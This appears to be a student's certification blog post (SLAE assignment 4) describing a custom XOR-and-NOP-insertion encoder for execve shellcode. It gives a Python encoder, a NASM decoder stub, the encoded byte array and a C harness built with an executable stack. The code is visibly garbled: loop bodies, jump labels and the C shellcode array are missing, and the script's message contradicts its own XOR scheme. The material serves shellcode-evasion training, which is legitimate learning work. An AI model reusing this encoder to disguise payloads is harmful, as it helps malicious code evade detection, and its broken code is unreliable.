SLAE- Assignment #4- Custom Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SLAE #1488
Author: Aaron Weathersby
Handle: t0b0rx0r

This assignment had me creating a custom encoder using a previously used execve-stack assembly. To tackle this assignment I opted for a realtively simple insertion scheme of a NOP and to modify every non NOP byte by XOR-ing it by 5.

Every original byte XOR’d by 0x05 and an inserted \x90

First I created a python script to take the exec-stack code and insert the NOP and perform the XOR

import sys
import  random
#//Author: Aaron Weathersby
#//SLAE #1488
#//Handle: t0b0x0r
#//Assignment #4- Insertion
#created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

encoded =""

print "Encoding Scheme Used:  SUB 05, insert an additional byte x90"

# xor 05 bytes from orginal
#insert additional byte \\x90
for y in bytearray(shellcode):
	org+= '0x'+'%02x' %y+','

for x in bytearray(shellcode):

print "Orginal Code:"
print org
print 'Encoded   shellcoded:'
print encoded2
#print shellcode

This produced machine code where every byte was XOR’d with a NOP inserted

shown is the unmodified machine code as well as the XOR/NOP’d code.

I then proceeded to create a NASM file that would go byte byte and undo the XOR and remove the extra NOP.

;Author: Aaron Weathersby
;SLAE #1488
;Handle: t0b0x0r
;Assignment #4- Custom Encoding Scheme
;created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

global _start

section .text
	jmp short call_decoder

	pop esi  ; save address of encoded 
	xor edi,edi ; new
	xor eax,eax
	mov al, 1
	xor ebx, ebx

	xor edx,edx
	xor ebx,ebx
	mov bl,byte [esi+eax]
	mov byte dl,byte [esi+eax-1]
	xor dl,5
	mov byte [esi+eax-1],byte dl
	cmp eax,0x32 ;62 in hex...shellcode size before second function
	jge short predecoder
	inc edi
	add eax,2
	jmp short reverseAdd

	;Reset for removal of insertion
	lea edi, [esi+1]
	xor ebx,ebx
	xor eax,eax
	mov al,1
	; Decode 
	mov bl, byte [esi+eax]
	xor edx,edx
	xor bl ,0x90
	jnz short encoded
	mov bl, byte[esi+eax+1]
	mov [edi], bl
	inc edi
	add al,2
	jmp short decoder

	call decode
	encoded: db 0x34,0x90,0xc5,0x90,0x55,0x90,0x6d,0x90,0x2a,0x90,0x2a,0x90,0x76,0x90,0x6d,0x90,0x6d,0x90,0x2a,0x90,0x67,0x90,0x6c,0x90,0x6b,0x90,0x8c,0x90,0xe6,0x90,0x55,0x90,0x8c,0x90,0xe7,0x90,0x56,0x90,0x8c,0x90,0xe4,0x90,0xb5,0x90,0x0e,0x90,0xc8,0x90,0x85,0x90 

I then outputed this machine code utilizing objdump to place int my shellcode.c file.

Now i will say….this assignment proved to be a bit of a time sink. Not because it was especially hard but because i didnt realize that the one liner obj-dump had been parsing my output in groups of 6 and after several days i realized that my code was working because some of the outputed exec code had a line of 7…certainly a learning exercise has i had to modify my objdump ouput as shown below.

\0x55 was missing causing my code to not work until i expanded the objdump to -f1-7

I then proceeded to insert the outputed code directly into my shellcode.c file

//Author: Aaron Weathersby
//SLAE #1488
//Handle: t0b0x0r
//;Assignment #4- Custom Encoding Scheme
//created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

unsigned char code[] = \



	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;




Compiled and ran applicaiton with success!

gcc -fno-stack-protector -z execstack shellcode_assignment4.c -o shellcode_assignment4